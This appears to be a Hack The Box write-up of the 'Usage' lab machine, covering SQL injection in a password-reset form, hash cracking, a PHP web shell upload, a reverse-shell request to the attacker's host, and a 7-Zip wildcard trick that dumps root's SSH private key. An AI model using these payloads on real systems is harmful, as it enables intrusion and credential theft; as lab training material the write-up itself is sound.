> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-usage.md).

# HTB - Usage

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FACUrTKL0nNtxHKcGBlFg%2Fimage.png?alt=media&amp;token=3918bdb6-c9c2-4bf3-bc6a-ad15cd1cd7e7" alt=""><figcaption></figcaption></figure>

add to hosts file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzWG2PDLnyAZ0AgKMpVTK%2Fimage.png?alt=media&amp;token=6d7ef021-c73b-4d10-8a05-8871223b2372" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3ApiIspRDUpcZhPTLE5N%2Fimage.png?alt=media&amp;token=9bbcf2cb-ed4c-4f0a-b4f5-629875159f0e" alt=""><figcaption></figcaption></figure>

clicking on admin leaks another subdomain.

add it to the hosts file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4KBFhH7ftZjuROABysZR%2Fimage.png?alt=media&amp;token=3df15ede-e97c-404a-be84-45c420956d39" alt=""><figcaption></figcaption></figure>

another login page.

registration page on the main site, lets register a new user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fcz46aFu5Dyb86ynWaVne%2Fimage.png?alt=media&amp;token=12afb51b-74bc-4ad1-8ee2-accf5f92064e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmwVRiq4Xy3SBp52Mv1Cw%2Fimage.png?alt=media&amp;token=9db8faed-3ea9-4b98-98ac-3733c7b78ac3" alt=""><figcaption></figcaption></figure>

password must be 6 characters.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEJfNebqOuz0tomysLo4y%2Fimage.png?alt=media&amp;token=0f53215c-765f-4ff4-bd73-adb65ead0cf1" alt=""><figcaption></figcaption></figure>

once created with 6 digit pass registration is successful and can use to login.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpeIXF6tQYAwbR8kkwCX8%2Fimage.png?alt=media&amp;token=fb565e8d-60d0-44d4-b33d-8db1e1ee3fe9" alt=""><figcaption></figcaption></figure>

nothing interesting on the dashboard other than the website is written in laravel framework., there is also a forget password link

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1Ufs8QanQoxPeF7KJheD%2Fimage.png?alt=media&amp;token=4b4de03b-2b77-419c-89a4-f80706f99336" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaPrdY9ft1ZQpjEx0SUCw%2Fimage.png?alt=media&amp;token=a5bfd2ef-3523-4c6f-a8b3-ba1c5ccc6aa6" alt=""><figcaption></figcaption></figure>

sends email can bruteforce password for other users.\
can be any combinations would not be feasible.

that said i will test the password reset functionality for sql injection and the login page is not vulnerable to sql injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMxjk2fvmp92i2xHng3Xt%2Fimage.png?alt=media&amp;token=35d5cd5e-e951-4aba-8ad0-2bdfa5374652" alt=""><figcaption></figcaption></figure>

testing for sql injection results in server error, strong indication that it is vulnerable to sql injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0w7mZc7Pyfx6VhgwU5bP%2Fimage.png?alt=media&amp;token=259fae65-7290-4696-bea2-f4dba97d2705" alt=""><figcaption></figcaption></figure>

7 columns result error but 8 results in found.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fis522DtQH3fCbLJ0Hpe5%2Fimage.png?alt=media&amp;token=43c2b3b5-21b3-48ac-b3ac-a248327a628c" alt=""><figcaption></figcaption></figure>

that said i will use sqlmap to enumerate the database.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fg2CqDlf1jLHmsjdsPP65%2Fimage.png?alt=media&amp;token=c7033b14-1d95-4770-97f6-14a1d0a2e56c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FeIEIHcJ8dgQdobEm7Yyn%2Fimage.png?alt=media&amp;token=14e368b6-f47e-405f-bd00-9fb20aac30cc" alt=""><figcaption></figcaption></figure>

3 databases found

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFkeFYvw6WkJWIhAHo32X%2Fimage.png?alt=media&amp;token=d3d37fe0-62e3-4111-81c9-2af3cca66ef0" alt=""><figcaption></figcaption></figure>

Found 15 tables in the usage\_blog database.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4O76JohBBT2BEyjnrqcb%2Fimage.png?alt=media&amp;token=543aa9b6-218e-41f6-812b-bd753b2bdb97" alt=""><figcaption></figcaption></figure>

admin\_users table looks interesting.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1u2nZNqCtOp3HrTYoHik%2Fimage.png?alt=media&amp;token=2f299ec3-fd69-4e9e-a393-db7243240fa1" alt=""><figcaption></figcaption></figure>

found the above columns lets dump the data.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRUA8kPcmYqIxHZchZNk1%2Fimage.png?alt=media&amp;token=f0575211-df83-43d1-97e1-38bd3900178c" alt=""><figcaption></figcaption></figure>

lets crack the hash

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmVe6VVY38GyHfurzc9Vv%2Fimage.png?alt=media&amp;token=fc61ea66-1fa2-4d95-9e85-36335b770603" alt=""><figcaption></figcaption></figure>

password cracked. using the credentials i can login to the admin login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4vKg9vORkF2xMutLk5zQ%2Fimage.png?alt=media&amp;token=b6d74726-01d3-463c-99c9-a628c14db26a" alt=""><figcaption></figcaption></figure>

logged in successfully.

laravel version is 10.18.0.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FumEarU7lZ9RiNUXRaFGc%2Fimage.png?alt=media&amp;token=69e2350c-ef0e-455b-99f7-5e7b6c5bf9c2" alt=""><figcaption></figcaption></figure>

the vulnerability in the user profile/avatar settings.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPOTHDP0GZs84mPHlS3XX%2Fimage.png?alt=media&amp;token=bb965b03-6686-4108-b1f8-f2fbaa2b8d87" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwXkun9YoP3l2fikdpElk%2Fimage.png?alt=media&amp;token=b4de2c5d-e461-4eb5-a547-af2303ac9a7f" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ cat shell.php.jpg
<?php system($_GET['c']); ?>
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6inarMSAqRKYKswhBYaz%2Fimage.png?alt=media&amp;token=9f6ee383-f552-4412-8c8a-13b06d462efa" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F32R3Ht7fxx8wf30ykbfv%2Fimage.png?alt=media&amp;token=3d01fe5f-0c62-4bee-b796-3042e08c9f93" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FumvyM9c5QRVPpuZcEzSd%2Fimage.png?alt=media&amp;token=ad667908-b3a0-4b1f-8ca7-8bd74ed44305" alt=""><figcaption></figcaption></figure>

opening the image results in nothing

so i need to find a way to make it execute php.

what i will do is while uploading i will change the extension in burp.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FONHsaLa6U8GyofEWGv9K%2Fimage.png?alt=media&amp;token=eec7159c-1040-4f7a-b8b3-58db90495f51" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiyLyv24Cm4C6Px9R4SWz%2Fimage.png?alt=media&amp;token=de287394-8c9f-4dde-908a-14bafa02023d" alt=""><figcaption></figcaption></figure>

that said i will use it get shell access.

```
http://admin.usage.htb/uploads/images/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.14.49/4444%200%3E%261%27
```

## Shell as Dash

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7OxqROsKAjIGv2vkQ7Z5%2Fimage.png?alt=media&amp;token=a97aff7d-1481-451c-9cba-f4c315625035" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPHGGUEC0TAXZnmqNwfQK%2Fimage.png?alt=media&amp;token=2a9501f1-e114-4b6b-8440-df1973dd1712" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9Nt78Bo22QRBH622G72T%2Fimage.png?alt=media&amp;token=7b02ac35-cef6-4a40-9d34-4fff8ae8e856" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuPqel3O7FMLvR4n4esCP%2Fimage.png?alt=media&amp;token=f770dd70-5757-4f0e-ba74-58e5a103eb5d" alt=""><figcaption></figcaption></figure>

i will use it to ssh to dash

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fv5mQqPJwaNG9W472Tn9Q%2Fimage.png?alt=media&amp;token=18b07614-a99a-48da-aa8d-924ae6b7a397" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FM3q7k5kXTv77hH05sZiF%2Fimage.png?alt=media&amp;token=cfca18f5-3b86-4590-8e07-edc28b15372c" alt=""><figcaption></figcaption></figure>

the monitoring script leaked a password i can try against xander.

## Shell as Xander

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJ2bfZjQ8iBRTjhxAUqks%2Fimage.png?alt=media&amp;token=3b368e75-4b02-447d-9238-4148110243c6" alt=""><figcaption></figcaption></figure>

```
xander: 3nc0d3d_pa$$w0rd
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fu74TOe0ODHALngLthEYe%2Fimage.png?alt=media&amp;token=57062f29-c992-4258-a886-9ac8a8a38f80" alt=""><figcaption></figcaption></figure>

xander can run usage\_management as root.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ff6K795ZNxq7IpbyCksGL%2Fimage.png?alt=media&amp;token=47bab67c-a1b6-4302-92b9-04e0a9f89fa2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9Mq5YtY5sadiTJK4scIg%2Fimage.png?alt=media&amp;token=a7ef05b5-37fd-415a-b867-80c678bc1893" alt=""><figcaption></figcaption></figure>

the tool is a LSB pie executable.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTywdI0Kjk2O1Kzl6Okig%2Fimage.png?alt=media&amp;token=27b39c37-ca5f-4e95-849e-5c7ba7cc68f0" alt=""><figcaption></figcaption></figure>

the 7zip command has wildcard, seeing wildcard in commands is always interesting.

what it does is it uses chdir to change the directory to /var/www/html and the uses 7zip to backup everything in the directory to /var/backups/project.zip.

If an attacker can create or rename a file inside `/var/www/html` with a name that contains shell meta characters (e.g., `$(id)`), the shell will **execute** the command when the wildcard is expanded.

i will create a symbolic link to roots private key and use it to get access as root

```bash
xander@usage:/var/www/html$ touch @ajay; ln -fs /root/.ssh/id_rsa ajay
```

```bash
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management
xander@usage:~$ sudo usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--       
Path = /var/backups/project.zip
Type = zip
Physical Size = 54830652

Scanning the drive:
          
WARNING: No more files
-----BEGIN OPENSSH PRIVATE KEY-----


WARNING: No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW


WARNING: No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi


WARNING: No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q


WARNING: No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs


WARNING: No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=


WARNING: No more files
-----END OPENSSH PRIVATE KEY-----

2984 folders, 17948 files, 113879692 bytes (109 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 20932

                                                                               
Files read from disk: 17948
Archive size: 54830789 bytes (53 MiB)

Scan WARNINGS for files and folders:

-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
xander@usage:~$ 

```

&#x20;&#x20;

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDm2Xmzu6ryYomi9sNkgO%2Fimage.png?alt=media&amp;token=ec35506a-910d-4fea-ad29-cc3bfa3d0354" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-usage.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
